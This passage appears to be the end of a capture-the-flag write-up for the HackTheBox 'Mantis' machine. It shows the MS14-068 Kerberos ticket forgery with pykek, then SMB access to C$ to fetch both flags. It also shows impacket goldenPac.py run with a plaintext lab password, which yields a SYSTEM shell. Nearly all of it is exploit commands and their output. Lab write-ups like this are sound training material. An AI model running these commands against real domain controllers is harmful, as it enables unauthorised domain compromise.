root@kali# python /opt/pykek/ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local
Password: 
  [+] Building AS-REQ for mantis.htb.local... Done!
  [+] Sending AS-REQ to mantis.htb.local... Done!
  [+] Receiving AS-REP from mantis.htb.local... Done!
  [+] Parsing AS-REP from mantis.htb.local... Done!
  [+] Building TGS-REQ for mantis.htb.local... Done!
  [+] Sending TGS-REQ to mantis.htb.local... Done!
  [+] Receiving TGS-REP from mantis.htb.local... Done!
  [+] Parsing TGS-REP from mantis.htb.local... Done!
  [+] Creating ccache file 'TGT_james@htb.local.ccache'... Done!

This creates a file, TGT_james@htb.local.ccache. I’ll copy this into /tmp where it is used:

1
root@kali# cp TGT_james@htb.local.ccache /tmp/krb5cc_0

Filesystem Access

Now I have access to the entire filesystem:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root@kali# smbclient -W htb.local //mantis/c$ -k
Try "help" to get a list of possible commands.
smb: \> dir
  $Recycle.Bin                      DHS        0  Fri Sep  1 10:19:03 2017
  Documents and Settings            DHS        0  Tue Jul 14 01:06:44 2009
  inetpub                             D        0  Fri Sep  1 09:41:09 2017
  pagefile.sys                      AHS 2146951168  Wed Sep  2 16:33:23 2020
  PerfLogs                            D        0  Mon Jul 13 23:20:08 2009
  Program Files                      DR        0  Sat Dec 23 22:28:26 2017
  Program Files (x86)                DR        0  Fri Sep  1 14:28:51 2017
  ProgramData                        DH        0  Fri Sep  1 09:16:24 2017
  Recovery                          DHS        0  Fri Sep  1 01:39:12 2017
  System Volume Information         DHS        0  Thu Aug 31 20:02:33 2017
  Users                              DR        0  Fri Sep  1 10:19:01 2017
  Windows                             D        0  Sat Dec 23 22:31:49 2017

                5480959 blocks of size 4096. 288821 blocks available

I can grab both flags:

1
2
3
4
5
smb: \> get Users\james\desktop\user.txt
getting file \Users\james\desktop\user.txt of size 32 as Users\james\desktop\user.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)

smb: \> get Users\administrator\desktop\root.txt
getting file \Users\administrator\desktop\root.txt of size 32 as Users\administrator\desktop\root.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
____ $/usr/share/doc/python3-impacket/examples/goldenPac.py 'htb.local/james:J@m3s_P@ssW0rd!@mantis'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] User SID: S-1-5-21-4220043660-4019079961-2895681657-1103
[*] Forest SID: S-1-5-21-4220043660-4019079961-2895681657
[*] Attacking domain controller mantis.htb.local
[*] mantis.htb.local found vulnerable!
[*] Requesting shares on mantis.....
[*] Found writable share ADMIN$
[*] Uploading file AHYRyTll.exe
[*] Opening SVCManager on mantis.....
[*] Creating service LPnK on mantis.....
[*] Starting service LPnK.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>ifconfig
b"'ifconfig' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n"
C:\Windows\system32>ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : .htb
   IPv6 Address. . . . . . . . . . . : dead:beef::41a8:e26c:362f:e7d6
   Link-local IPv6 Address . . . . . : fe80::41a8:e26c:362f:e7d6%11
   IPv4 Address. . . . . . . . . . . : 10.129.167.60
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:c35e%11
                                       10.129.0.1

Tunnel adapter isatap..htb:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : .htb

This post is licensed under CC BY 4.0 by the author.